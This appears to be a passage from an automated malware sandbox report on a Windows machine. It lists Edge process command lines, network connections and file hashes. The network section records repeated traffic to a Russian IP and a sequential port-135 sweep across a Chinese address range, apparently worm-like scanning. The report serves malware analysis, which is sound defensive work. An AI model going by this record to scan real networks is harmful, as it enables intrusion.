"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffcb88ff208,0x7ffcb88ff214,0x7ffcb88ff220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1776,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:11

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2136,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2532,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:13

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3348,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3356,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4664,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=4876 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=4904 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5372,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5760 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe

cookie_exporter.exe --cookie-json=1128

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=6324,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=3428,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5676,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5736,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6500 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=3404,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5888,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2836 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5952,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=872,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=5512,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3592,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5780,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:10

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ÔN@

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3872,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5068 /prefetch:14

Network

Country Destination Domain Proto
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:80 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
RU 212.33.237.86:443 tcp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
RU 212.33.237.86:443 tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.27.68:443 copilot.microsoft.com tcp
RU 212.33.237.86:443 tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
RU 212.33.237.86:443 tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
GB 2.18.27.89:443 www.bing.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
N/A 224.0.0.251:5353 udp
RU 212.33.237.86:80 tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 150.171.28.11:443 edge.microsoft.com tcp
GB 2.18.27.89:443 www.bing.com udp
US 199.232.214.172:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
GB 2.18.27.82:443 www.bing.com udp
CN 125.210.192.1:135 tcp
CN 125.210.192.2:135 tcp
CN 125.210.192.3:135 tcp
CN 125.210.192.4:135 tcp
CN 125.210.192.5:135 tcp
CN 125.210.192.6:135 tcp
CN 125.210.192.7:135 tcp
CN 125.210.192.8:135 tcp
CN 125.210.192.9:135 tcp
CN 125.210.192.10:135 tcp
CN 125.210.192.11:135 tcp
CN 125.210.192.12:135 tcp
CN 125.210.192.13:135 tcp
CN 125.210.192.14:135 tcp
CN 125.210.192.15:135 tcp
CN 125.210.192.16:135 tcp
CN 125.210.192.17:135 tcp
CN 125.210.192.18:135 tcp
CN 125.210.192.19:135 tcp
CN 125.210.192.20:135 tcp
CN 125.210.192.21:135 tcp
CN 125.210.192.22:135 tcp
CN 125.210.192.23:135 tcp
CN 125.210.192.24:135 tcp
CN 125.210.192.25:135 tcp
CN 125.210.192.26:135 tcp
CN 125.210.192.27:135 tcp
CN 125.210.192.28:135 tcp
CN 125.210.192.29:135 tcp
CN 125.210.192.30:135 tcp
CN 125.210.192.31:135 tcp
CN 125.210.192.32:135 tcp
CN 125.210.192.33:135 tcp
CN 125.210.192.34:135 tcp
CN 125.210.192.35:135 tcp
CN 125.210.192.36:135 tcp
CN 125.210.192.37:135 tcp
CN 125.210.192.38:135 tcp
CN 125.210.192.39:135 tcp
CN 125.210.192.40:135 tcp
CN 125.210.192.41:135 tcp
CN 125.210.192.42:135 tcp
CN 125.210.192.43:135 tcp
CN 125.210.192.44:135 tcp
CN 125.210.192.45:135 tcp
CN 125.210.192.46:135 tcp
CN 125.210.192.47:135 tcp
CN 125.210.192.48:135 tcp
CN 125.210.192.49:135 tcp
CN 125.210.192.50:135 tcp
CN 125.210.192.51:135 tcp
CN 125.210.192.52:135 tcp
CN 125.210.192.53:135 tcp
CN 125.210.192.54:135 tcp
CN 125.210.192.55:135 tcp
CN 125.210.192.56:135 tcp
CN 125.210.192.57:135 tcp
CN 125.210.192.58:135 tcp
CN 125.210.192.59:135 tcp
CN 125.210.192.60:135 tcp
CN 125.210.192.61:135 tcp
CN 125.210.192.62:135 tcp
CN 125.210.192.63:135 tcp
CN 125.210.192.64:135 tcp
CN 125.210.192.65:135 tcp
CN 125.210.192.66:135 tcp
CN 125.210.192.67:135 tcp
CN 125.210.192.68:135 tcp
CN 125.210.192.69:135 tcp
CN 125.210.192.70:135 tcp
CN 125.210.192.71:135 tcp
CN 125.210.192.72:135 tcp
CN 125.210.192.73:135 tcp
CN 125.210.192.74:135 tcp
CN 125.210.192.75:135 tcp
CN 125.210.192.76:135 tcp
CN 125.210.192.77:135 tcp
CN 125.210.192.78:135 tcp
CN 125.210.192.79:135 tcp
CN 125.210.192.80:135 tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
CN 125.210.192.81:135 tcp
CN 125.210.192.82:135 tcp
CN 125.210.192.83:135 tcp
CN 125.210.192.84:135 tcp
CN 125.210.192.85:135 tcp
CN 125.210.192.86:135 tcp
CN 125.210.192.87:135 tcp
CN 125.210.192.88:135 tcp
CN 125.210.192.89:135 tcp
CN 125.210.192.90:135 tcp
CN 125.210.192.91:135 tcp
CN 125.210.192.92:135 tcp
CN 125.210.192.93:135 tcp
CN 125.210.192.94:135 tcp
CN 125.210.192.95:135 tcp
CN 125.210.192.96:135 tcp
CN 125.210.192.97:135 tcp
CN 125.210.192.98:135 tcp
CN 125.210.192.99:135 tcp
CN 125.210.192.100:135 tcp
CN 125.210.192.101:135 tcp
CN 125.210.192.102:135 tcp
CN 125.210.192.103:135 tcp
CN 125.210.192.104:135 tcp
CN 125.210.192.105:135 tcp
CN 125.210.192.106:135 tcp
CN 125.210.192.107:135 tcp
CN 125.210.192.108:135 tcp
CN 125.210.192.109:135 tcp
CN 125.210.192.110:135 tcp
CN 125.210.192.111:135 tcp
CN 125.210.192.112:135 tcp
CN 125.210.192.113:135 tcp
CN 125.210.192.114:135 tcp
CN 125.210.192.115:135 tcp
CN 125.210.192.116:135 tcp
CN 125.210.192.117:135 tcp
CN 125.210.192.118:135 tcp
CN 125.210.192.119:135 tcp
CN 125.210.192.120:135 tcp
CN 125.210.192.121:135 tcp
CN 125.210.192.122:135 tcp
CN 125.210.192.123:135 tcp
CN 125.210.192.124:135 tcp
CN 125.210.192.125:135 tcp
CN 125.210.192.126:135 tcp
CN 125.210.192.127:135 tcp
CN 125.210.192.128:135 tcp
CN 125.210.192.129:135 tcp
CN 125.210.192.130:135 tcp
CN 125.210.192.131:135 tcp
CN 125.210.192.132:135 tcp
CN 125.210.192.133:135 tcp
CN 125.210.192.134:135 tcp
CN 125.210.192.135:135 tcp
CN 125.210.192.136:135 tcp
CN 125.210.192.137:135 tcp
CN 125.210.192.138:135 tcp
CN 125.210.192.139:135 tcp
CN 125.210.192.140:135 tcp
CN 125.210.192.141:135 tcp
CN 125.210.192.142:135 tcp
CN 125.210.192.143:135 tcp
CN 125.210.192.144:135 tcp
CN 125.210.192.145:135 tcp
CN 125.210.192.146:135 tcp
CN 125.210.192.147:135 tcp
CN 125.210.192.148:135 tcp
CN 125.210.192.149:135 tcp
CN 125.210.192.150:135 tcp
CN 125.210.192.151:135 tcp
CN 125.210.192.152:135 tcp
CN 125.210.192.153:135 tcp
CN 125.210.192.154:135 tcp
CN 125.210.192.155:135 tcp
CN 125.210.192.156:135 tcp
CN 125.210.192.157:135 tcp
CN 125.210.192.158:135 tcp
CN 125.210.192.159:135 tcp
CN 125.210.192.160:135 tcp
CN 125.210.192.161:135 tcp
CN 125.210.192.162:135 tcp
CN 125.210.192.163:135 tcp
CN 125.210.192.164:135 tcp
CN 125.210.192.165:135 tcp
CN 125.210.192.166:135 tcp
CN 125.210.192.167:135 tcp
CN 125.210.192.168:135 tcp
CN 125.210.192.169:135 tcp
CN 125.210.192.170:135 tcp
CN 125.210.192.171:135 tcp
CN 125.210.192.172:135 tcp
CN 125.210.192.173:135 tcp
CN 125.210.192.174:135 tcp
CN 125.210.192.175:135 tcp
CN 125.210.192.176:135 tcp
CN 125.210.192.177:135 tcp
CN 125.210.192.178:135 tcp
CN 125.210.192.179:135 tcp
CN 125.210.192.180:135 tcp
CN 125.210.192.181:135 tcp
CN 125.210.192.182:135 tcp
CN 125.210.192.183:135 tcp
CN 125.210.192.184:135 tcp
CN 125.210.192.185:135 tcp
CN 125.210.192.186:135 tcp
CN 125.210.192.187:135 tcp
CN 125.210.192.188:135 tcp
CN 125.210.192.189:135 tcp
CN 125.210.192.190:135 tcp
CN 125.210.192.191:135 tcp
CN 125.210.192.192:135 tcp
CN 125.210.192.193:135 tcp
CN 125.210.192.194:135 tcp
CN 125.210.192.195:135 tcp
CN 125.210.192.196:135 tcp
CN 125.210.192.197:135 tcp
CN 125.210.192.198:135 tcp
CN 125.210.192.199:135 tcp
CN 125.210.192.200:135 tcp
CN 125.210.192.201:135 tcp
CN 125.210.192.202:135 tcp
CN 125.210.192.203:135 tcp
CN 125.210.192.204:135 tcp
CN 125.210.192.205:135 tcp
CN 125.210.192.206:135 tcp
CN 125.210.192.207:135 tcp
CN 125.210.192.208:135 tcp
CN 125.210.192.209:135 tcp
CN 125.210.192.210:135 tcp
CN 125.210.192.211:135 tcp
CN 125.210.192.212:135 tcp
CN 125.210.192.213:135 tcp
CN 125.210.192.214:135 tcp
CN 125.210.192.215:135 tcp
CN 125.210.192.216:135 tcp
CN 125.210.192.217:135 tcp
CN 125.210.192.218:135 tcp
CN 125.210.192.219:135 tcp
CN 125.210.192.220:135 tcp

Files

C:\Program Files\7-Zip\7z.exe

MD5 ccdca87540e56b27f2b104bb036662ff
SHA1 36d79e579770a2e4f619b4c09e635c5d48ff56d5
SHA256 630f929545e8277fe3a65970a8ed8c6b8271e2c6446e23334e117fdcecf2c51d
SHA512 636e01d3633c5f1abb0736acaab01e3a7a8f7dfe6c919750fab5cfffb85419432829464963af1a4c2f35458a7ab32d2913efdc8beacfdfd2f605cbf82fcf1a37

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cdff623fbbb16b2e2df2d00641ce4ea7
SHA1 8cd0b1c131528360fd588f4039c2fd1f6bfd5268
SHA256 5b6f714d384580984a4396f04997e09ee8619d2e2e8780472c911c1368c81479
SHA512 fc1067edbd3afb30765e039fbf436800b434631bd581bc2854db3a6dd263fbc5dbd68846de39d969091902198ded6228a4b012e54737b40a3de35072a42b6681

\??\pipe\crashpad_5292_RTAFTFVKVSANZYYM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 03b6ceee6d3294b477cb96be0a4821a2
SHA1 17508a8b887dac0d5b2fdf62cce6ee7989564165
SHA256 e373291cec4f23986133c23daa353551f05eda26aac4a4e3686c40f8bfda576e
SHA512 581fbd959baff647df5ac757c03b071653bca94c529807775b30e0f4b88ade1f0dd99850daaea1fa0861ce83d3e9d505a004e6c78d45e923ee39728a2d9efda9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

MD5 06d55006c2dec078a94558b85ae01aef
SHA1 6a9b33e794b38153f67d433b30ac2a7cf66761e6
SHA256 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd
SHA512 ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

MD5 934d6a13fbfb4ae8743c8261d8aa980a
SHA1 f1bd24c8a5791e92eec58d8947828b63c7bc8679
SHA256 ca374ed95b4bce8b5176da51d2bfb080840a791981d8139641dea874b7e582ac
SHA512 5ce3d1ebcca354fc9f04e1a1d0a9d1c0f4f79c6ad3051b6298ec3cc091d01e8967a53763e1860dda84bdffed3f5fc0565912a7ab4c639d9091a89ba2365db670

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 afd3c5ce0014b19ed9f1ab0ccb610ac4
SHA1 67092caede60e40d67327f50f6ff6849cae0b417
SHA256 db7faba94361b022c851b0fa50e37af106c2402d975fc78553757a2793640d3f
SHA512 c300b1fa73ec915f4ef62d2e3970838d1dc1c63dd72ea9f1d3d7f7e29c61583e205c1710d15237b4f276722e50fa4a7e47545153b4889bc966ebcbe576f085f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2e98928ff585f8761f31526111a7aab8
SHA1 e681ae864d6c3cace37d72df875004b325ecdb9d
SHA256 8ac342a17e4d8bed45b06122f4569e7466d05737b45d2a30e1bb1c085e63517b
SHA512 744ebdd4dc2f8b4c9355a003dfd098224fd43adcbe99302c1f41defd3b9f094716bc32c722ced0bb6f4af90f47af0ceec2cb0cab9e919c9eac0f95361939cfde

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 fd2bf8754a52c30c7c7c1d7859e89800
SHA1 b28e6d8d6bd4b7d3c17bfc82bf675b624b8126cf
SHA256 3a4c360ece19a6456a752c7c15cf99cc22661face959e5869aca823fa66838e1
SHA512 2b5584e744fe42436f45af8f975ec10443bd82bef713522a2d23c922c20d363483798c9b435baa4e9f015d9bca0761f0abaa4d2b276fc035179c2151667f2ad2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 3215d72304efe38cbdcedaf22c170a8a
SHA1 a18bd9209c3d4c7f06710491aac0cf99fed1d04f
SHA256 75f5eeeb175e1c37ea1022bb9426fc33f0c761ac30fb09599493d0ce08f671ee
SHA512 d3b2b688e6e7839784730b0a8badafee99f799a50af383cd9690f3ca1b037de156cb2a2091160242658a4c6bc9509721c098c556a225cf2eb028b98a26136d42

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 d5597e746878fede733d9c916085ff07
SHA1 ad6e79cff797c397c644cb90c43e61f0b91a11fd
SHA256 406b468eb7efa1329fd66e656e9fa68f1c4ac1876ea97776fb95df3318a2f646
SHA512 7f374420af238648aac379358db2fec66a9b5cb66b599c130f9fbf326103a30e2497052752618939fd55797bc62418b9a766c0cfb75470e52617d6b390b852e5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 338b5cb7cb7a0f02c6d5ec7e082f053d
SHA1 10853919c968311668dc0b0bad95ce50ff1f5652
